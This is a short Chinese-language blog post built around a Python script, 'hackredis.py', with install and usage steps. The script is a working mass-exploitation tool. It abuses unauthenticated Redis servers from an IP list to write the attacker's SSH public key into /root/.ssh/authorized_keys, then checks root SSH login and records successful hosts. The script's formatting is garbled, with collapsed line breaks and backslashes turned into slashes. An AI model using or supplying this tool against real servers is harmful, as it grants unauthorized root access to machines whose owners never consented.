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技术 2022年11月14日
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①能有对 /root/.ssh/目录写入的权限



sudo easy_install redis


redis python hackredis.py
usage: hackredis.py [-h] [-l IPLIST] [-p PORT] [-r ID_RSAFILE] [-sp SSH_PORT]For Example:
python hackredis.py -l ip.txt -p 6379 -r foo.txt -sp 22optional arguments:
-h, --help show this help message and exit
-l IPLIST the hosts of target
-p PORT the redis default port
-r ID_RSAFILE the ssh id_rsa file you generate
-sp SSH_PORT the ssh port


ssh-keygen -t rsa              /一直按回车就OK了
cp ~/.ssh/id_rsa.pub /tmp/foo.txt


将ip列表填入ip.txt,然后就可以跑了。 成功的将会输出到success.txt,执行成功但是ssh连接失败的会存储在unconnect.txt,操作失败的会存储在fail.txt。

!/usr/bin/python#coding:utf-8############################################################### @file hackredis.py         #### @date 2015-12-11          #### @author evi1cg           ###############################################################import redisimport argparseimport textwrapimport sysimport pexpectdef getargs():    parser = argparse.ArgumentParser(prog='hackredis.py', formatter_class=argparse.RawTextHelpFormatter, description=textwrap.dedent('''/    For Example:    -----------------------------------------------------------------------------    python hackredis.py -l ip.txt -p 6379 -r foo.txt -sp 22'''))    parser.add_argument('-l', dest='iplist', type=str, help='the hosts of target')    parser.add_argument('-p', dest='port', default=6379, type=int, help='the redis default port')    parser.add_argument('-r', dest='id_rsafile', type=str, help='the ssh id_rsa file you generate')    parser.add_argument('-sp', dest='ssh_port', type=int,default=22, help='the ssh port')    if(len(sys.argv[1:]) / 2 != 4):        sys.argv.append('-h')    return parser.parse_args()def hackredis(host,port):    ck = 0    try:        print "[*] Attacking ip:%s"%host        r =redis.StrictRedis(host=host,port=port,db=0,socket_timeout=2)        r.flushall        r.set('crackit',foo)        r.config_set('dir','/root/.ssh/')        r.config_set('dbfilename','authorized_keys')        r.save()        ck =1    except:        print "/033[1;31;40m[-]/033[0m Something wrong with %s"%host        write(host,2)        ck =0    if ck == 1:        check(host)    else:        passdef check(host):    print '/033[1;33;40m[*]/033[0m Check connecting... '    try:            ssh = pexpect.spawn('ssh root@%s -p %d' %(host,ssh_port))            i = ssh.expect('[#/$]',timeout=2)            if i == 0:                print "/033[1;34;40m[+]/033[0m Success !"                write(host,1)            else:                pass    except:            print "/033[1;32;40m[-]/033[0m Failed to connect !"            write(host,3)def write(host,suc):    if suc == 1:        filesname = 'success.txt'    elif suc ==2:        filesname = 'fail.txt'    elif suc ==3:        filesname = 'unconnect.txt'    else:        pass    file_object = open(filesname,'a')    file_object.write(host+'/n')    file_object.close()def main():    global foo,ssh_port    paramsargs = getargs()    try:        hosts = open(paramsargs.iplist,"r")    except(IOError):        print "Error: Check your hostfile path/n"        sys.exit(1)     port = paramsargs.port    ssh_port = paramsargs.ssh_port    try:        foo = '/n/n/n'+open(paramsargs.id_rsafile,"r").readline()+'/n/n/n'    except(IOError):        print "Error: Check your wordlist path/n"        sys.exit(1)      ips = [p.replace('/n','') for p in hosts]    for ip in ips:        hackredis(ip.strip(),port)if __name__ == "__main__":    main()


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